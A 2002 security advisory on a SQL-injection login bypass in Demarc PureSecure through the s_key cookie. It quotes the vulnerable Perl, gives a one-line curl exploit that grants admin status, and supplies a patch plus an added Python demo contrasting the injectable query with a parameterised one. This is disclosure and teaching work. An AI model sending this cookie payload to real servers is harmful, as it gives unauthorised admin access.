26th Sep 2002 [SBWID-5293]
COMMAND
Demarc PureSecure login bypass
SYSTEMS AFFECTED
all versions ?
PROBLEM
pokleyzz sakamaniaka says:
Demarc PureSecure (http://www.demarc.org) is an all-inclusive network
monitoring solution that allows you to monitor an entire network of
servers from one powerful web interface.
A user can bypass the login and obtain admin status by SQL injection
through the s_key cookie.
--------- line 319 ------------------------------
# the raw cookie value is handed to check_login without any validation
elsif (($cookies{'s_key'}) && ($cookies{'s_key'}->value)){
    $logged_in_as = &check_login($cookies{'s_key'}->value);
    if (!$logged_in_as){
        &print_login_screen;
        &safe_exit;
    }
-----------------------------------------------------
s_key is then used unescaped in the SQL query built by the function check_login (line 6114):
--------- line 6114 ---------------------------------
# $session_id (the cookie value) is interpolated straight into the WHERE clause
$sql_query = " SELECT \
    f1,f2,f3,admin,username,UNIX_TIMESTAMP(current_login_timedate) AS LOGINTIME \
    FROM \
    dm_sessions \
    WHERE current_session_id = '$session_id' ";
-----------------------------------------------------
Exploit
=======
Using curl:
curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc
SOLUTION
Patch as follows:
line 6113: &safe_slash(\$session_id);
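As an added example, not code from the advisory or from Demarc PureSecure, the following Python script rebuilds the check_login lookup over an in-memory SQLite copy of dm_sessions (the table layout, the session row and the helper names are assumptions made for the demo) to show how the s_key cookie value reaches the WHERE clause and what a bound parameter does instead of the string interpolation above. SQLite has neither MySQL's # comment nor UNIX_TIMESTAMP(), so the payload that is actually executed drops the trailing # of the advisory's cookie and lets the query's own closing quote terminate the injected text; the advisory's exact cookie is only decoded and shown as the SQL string MySQL would receive.

```python
# Added example, not code from the advisory or from Demarc PureSecure.
# Assumptions: dm_sessions layout, the single constructed admin row, and
# CGI.pm-style percent-decoding of cookie values (urllib.parse.unquote
# stands in for it here).
import sqlite3
from urllib.parse import unquote

# Cookie value exactly as the advisory's curl command sends it.
ADVISORY_COOKIE = "'%20OR%20current_session_id%20like%20'%'%23"
# Same injection without the '#' terminator, so SQLite can run it:
# the query's own closing quote ends the injected LIKE pattern.
SQLITE_COOKIE = "'%20OR%20current_session_id%20like%20'%"
# A well-formed session id (constructed).
REAL_SESSION = "c0ffee1234deadbeef"


def decode_cookie(raw):
    """CGI.pm percent-decodes cookie values before the script sees them."""
    return unquote(raw)


def build_query(session_id):
    """The advisory's pattern: the cookie value is interpolated straight
    into the SQL string (column list trimmed to what SQLite can run)."""
    return ("SELECT admin, username FROM dm_sessions "
            "WHERE current_session_id = '" + session_id + "'")


def make_db():
    """Constructed sample data: a single admin session row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dm_sessions (admin INTEGER, username TEXT, "
               "current_session_id TEXT, current_login_timedate INTEGER)")
    db.execute("INSERT INTO dm_sessions VALUES (1, 'admin', ?, 1033000000)",
               (REAL_SESSION,))
    db.commit()
    return db


def check_login_vulnerable(db, raw_cookie):
    """Mirrors the affected code path: cookie -> string-built query."""
    return db.execute(build_query(decode_cookie(raw_cookie))).fetchall()


def check_login_fixed(db, raw_cookie):
    """Same lookup with a bound parameter: the cookie is only ever
    compared as a value and is never parsed as SQL."""
    return db.execute(
        "SELECT admin, username FROM dm_sessions WHERE current_session_id = ?",
        (decode_cookie(raw_cookie),),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("query MySQL would receive for the advisory's cookie:")
    print("  " + build_query(decode_cookie(ADVISORY_COOKIE)))
    print("vulnerable lookup, injected cookie:",
          check_login_vulnerable(db, SQLITE_COOKIE))
    print("fixed lookup, injected cookie:   ",
          check_login_fixed(db, SQLITE_COOKIE))
    print("fixed lookup, real session id:   ",
          check_login_fixed(db, REAL_SESSION))
```

With the injected cookie the string-built query becomes WHERE current_session_id = '' OR current_session_id like '%' and returns the first session row, which in this sample (and, per the advisory, on a real install) is an admin session; the bound-parameter version returns nothing for the same cookie and still finds the row for a genuine session id. The advisory's own patch escapes the value with safe_slash before interpolation, which closes this particular quote-breaking payload; a placeholder removes the whole class of problem rather than one payload.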